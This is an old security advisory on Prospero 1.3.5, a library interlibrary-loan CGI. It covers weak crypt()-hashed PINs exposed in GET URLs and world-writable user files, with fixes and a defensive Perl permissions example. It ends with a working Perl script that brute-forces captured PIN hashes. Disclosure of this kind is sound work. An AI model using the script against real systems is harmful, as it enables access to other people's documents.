SUBMISSION - multiple vulnerabilities in Prospero 1.3.5 CGI

2001-02-02 00:00:00
vulners.com

= Warped Force Advisory =

Author: darkyoda <[email protected]>
Subject: Multiple vulnerabilities in Prospero 1.3.5 CGI
Discovered: 12.15.00
Announced: 2.1.01
Vendor Status: Maintainer notified 12.27.00. New version released.
Current version is 1.3.7
Platforms: Any web server capable of running CGI scripts; this
includes UNIX and Windows platforms (Apache, IIS, etc.)
Product Homepage: http://bones.med.ohio-state.edu/prospero/

Blurb: "Prospero is a Web-based document delivery system designed as
            a complement to the Ariel ® software system. Ariel is a product
            of the Research Libraries Group (RLG) which allows libraries to
            use the Internet to exchange documents through interlibrary
            loan."

Problem: Client-side Prospero generates a random 3- or 4-digit PIN that
            users enter into a web-based form to gain access to documents
            requested through interlibrary loan. Because the form uses the
            GET method, the encrypted PIN is visible in the browser. A
            perusal of login.pl reveals that Perl's crypt() function is used
            to encrypt (hash) the PIN. Since the PIN space is so small, it is
            trivial for an attacker to recover the PIN from the hash by brute
            force; this would allow access to user documents, allowing
            malicious users to delete them arbitrarily or to determine the
            subject of a user's research.

            In addition, login.pl creates its log and manifest files with
            0666 (world-writable) permissions. The manifest file is the user
            database containing PINs and usernames. Non-Prospero users can
            modify or delete entries in this file as they please.

Solution: Upgrade to the latest version, 1.3.7. Note that I have not
            reviewed the source of this latest version. Clients who cannot
            upgrade should change the file permissions in login.pl to 0660
            and consider using complex alphanumeric PINs in lieu of the ones
            generated by Prospero. Note that this will only slow an attacker,
            as the hash could still be brute-forced by an industrial password
            cracker, à la John the Ripper.
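The file-permission part of the workaround above, written out as an added example (not Prospero's own login.pl): open_restricted() creates a log or manifest file with mode 0660 instead of 0666 and world_writable() is the check a client can run against an existing file. The temporary directory, file names and manifest entry are constructed for the demo.

```perl
#!/usr/bin/perl
# Added example, not Prospero code: create log/manifest files 0660 and
# detect files that were left world-writable (the 0666 case).
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_APPEND);
use File::Temp qw(tempdir);

# Open $path for appending, creating it owner/group-writable only.
# sysopen()'s mode is still filtered by the umask, so clear the
# "other" bits for the duration of the call.
sub open_restricted {
    my ($path) = @_;
    my $old_umask = umask(0007);
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_APPEND, 0660)
        or die "cannot open $path: $!";
    umask($old_umask);
    # A pre-existing file keeps its old mode; force 0660 on it as well.
    chmod(0660, $path) or die "cannot chmod $path: $!";
    return $fh;
}

# True if the mode bits grant write access to "other".
sub world_writable {
    my ($path) = @_;
    my @st = stat($path) or die "cannot stat $path: $!";
    return ($st[2] & 0002) ? 1 : 0;
}

# Constructed demo: one manifest left 0666, one created with open_restricted().
my $dir = tempdir(CLEANUP => 1);
my $bad = "$dir/manifest.bad";
open(my $bad_fh, '>', $bad) or die "cannot create $bad: $!";
close $bad_fh;
chmod(0666, $bad) or die "cannot chmod $bad: $!";

my $good = "$dir/manifest.good";
my $good_fh = open_restricted($good);
print $good_fh "someuser:PLACEHOLDER_CRYPT_HASH\n";  # constructed entry
close $good_fh;

printf "%s world-writable: %d\n", $bad,  world_writable($bad);
printf "%s world-writable: %d\n", $good, world_writable($good);
```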

Shouts: Gyves, sysdaemon, 2600 (I forgive you for not publishing my
article), others. Eric Schnell (maintainer) for having
a good attitude.

Exploit:

#!/usr/bin/perl
#
# crack for prospero PINs
#
# dY 12.15.00
#
use strict;
use warnings;

printf("Enter encrypted PIN: ");
chomp(my $passwd = <STDIN>);

# crypt() output is the 2-character salt followed by the hash
my $salt = substr($passwd, 0, 2);

my $lowval  = 0;
my $highval = 9999;

# Try every numeric PIN in range; crypt() returns salt+hash, so the
# result is compared against the full encrypted string.
for (my $i = $lowval; $i <= $highval; $i++) {
    if (crypt($i, $salt) eq $passwd) {
        print("***Unencrypted PIN is: $i\n");
        exit(0);
    }
}
printf("Sorry, couldn't crack it. Try something > $highval.\n");
exit(0);